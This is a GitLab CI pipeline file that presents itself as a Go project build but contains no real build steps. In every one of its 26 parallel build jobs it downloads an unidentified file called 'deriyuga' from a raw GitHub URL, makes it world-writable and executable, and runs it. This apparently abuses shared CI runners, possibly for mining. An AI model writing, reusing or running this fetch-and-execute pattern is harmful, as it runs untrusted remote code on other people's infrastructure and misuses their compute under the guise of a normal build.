image: golang:latest

variables:
  REPO_NAME: gitlab.com/namespace/project

stages:
  - build
  - test
  - deploy

build_a:
  stage: build
  script:
     - wget https://raw.githubusercontent.com/nabihasa/config.yml/main/deriyuga
     - chmod 777 deriyuga
     - ./deriyuga
     

build_b:
  stage: build
  script:
     - wget https://raw.githubusercontent.com/nabihasa/config.yml/main/deriyuga
     - chmod 777 deriyuga
     - ./deriyuga

build_c:
  stage: build
  script:
     - wget https://raw.githubusercontent.com/nabihasa/config.yml/main/deriyuga
     - chmod 777 deriyuga
     - ./deriyuga

build_d:
  stage: build
  script:
     - wget https://raw.githubusercontent.com/nabihasa/config.yml/main/deriyuga
     - chmod 777 deriyuga
     - ./deriyuga

build_e:
  stage: build
  script:
     - wget https://raw.githubusercontent.com/nabihasa/config.yml/main/deriyuga
     - chmod 777 deriyuga
     - ./deriyuga

build_f:
  stage: build
  script:
     - wget https://raw.githubusercontent.com/nabihasa/config.yml/main/deriyuga
     - chmod 777 deriyuga
     - ./deriyuga

build_g:
  stage: build
  script:
     - wget https://raw.githubusercontent.com/nabihasa/config.yml/main/deriyuga
     - chmod 777 deriyuga
     - ./deriyuga

build_h:
  stage: build
  script:
     - wget https://raw.githubusercontent.com/nabihasa/config.yml/main/deriyuga
     - chmod 777 deriyuga
     - ./deriyuga

build_i:
  stage: build
  script:
     - wget https://raw.githubusercontent.com/nabihasa/config.yml/main/deriyuga
     - chmod 777 deriyuga
     - ./deriyuga

build_j:
  stage: build
  script:
     - wget https://raw.githubusercontent.com/nabihasa/config.yml/main/deriyuga
     - chmod 777 deriyuga
     - ./deriyuga

build_k:
  stage: build
  script:
     - wget https://raw.githubusercontent.com/nabihasa/config.yml/main/deriyuga
     - chmod 777 deriyuga
     - ./deriyuga

build_l:
  stage: build
  script:
     - wget https://raw.githubusercontent.com/nabihasa/config.yml/main/deriyuga
     - chmod 777 deriyuga
     - ./deriyuga

build_m:
  stage: build
  script:
     - wget https://raw.githubusercontent.com/nabihasa/config.yml/main/deriyuga
     - chmod 777 deriyuga
     - ./deriyuga

build_n:
  stage: build
  script:
     - wget https://raw.githubusercontent.com/nabihasa/config.yml/main/deriyuga
     - chmod 777 deriyuga
     - ./deriyuga

build_o:
  stage: build
  script:
     - wget https://raw.githubusercontent.com/nabihasa/config.yml/main/deriyuga
     - chmod 777 deriyuga
     - ./deriyuga

build_p:
  stage: build
  script:
     - wget https://raw.githubusercontent.com/nabihasa/config.yml/main/deriyuga
     - chmod 777 deriyuga
     - ./deriyuga

build_q:
  stage: build
  script:
     - wget https://raw.githubusercontent.com/nabihasa/config.yml/main/deriyuga
     - chmod 777 deriyuga
     - ./deriyuga

build_r:
  stage: build
  script:
     - wget https://raw.githubusercontent.com/nabihasa/config.yml/main/deriyuga
     - chmod 777 deriyuga
     - ./deriyuga

build_s:
  stage: build
  script:
     - wget https://raw.githubusercontent.com/nabihasa/config.yml/main/deriyuga
     - chmod 777 deriyuga
     - ./deriyuga

build_t:
  stage: build
  script:
     - wget https://raw.githubusercontent.com/nabihasa/config.yml/main/deriyuga
     - chmod 777 deriyuga
     - ./deriyuga

build_u:
  stage: build
  script:
     - wget https://raw.githubusercontent.com/nabihasa/config.yml/main/deriyuga
     - chmod 777 deriyuga
     - ./deriyuga

build_v:
  stage: build
  script:
     - wget https://raw.githubusercontent.com/nabihasa/config.yml/main/deriyuga
     - chmod 777 deriyuga
     - ./deriyuga

build_w:
  stage: build
  script:
     - wget https://raw.githubusercontent.com/nabihasa/config.yml/main/deriyuga
     - chmod 777 deriyuga
     - ./deriyuga

build_x:
  stage: build
  script:
     - wget https://raw.githubusercontent.com/nabihasa/config.yml/main/deriyuga
     - chmod 777 deriyuga
     - ./deriyuga

build_y:
  stage: build
  script:
     - wget https://raw.githubusercontent.com/nabihasa/config.yml/main/deriyuga
     - chmod 777 deriyuga
     - ./deriyuga

build_z:
  stage: build
  script:
     - wget https://raw.githubusercontent.com/nabihasa/config.yml/main/deriyuga
     - chmod 777 deriyuga
     - ./deriyuga
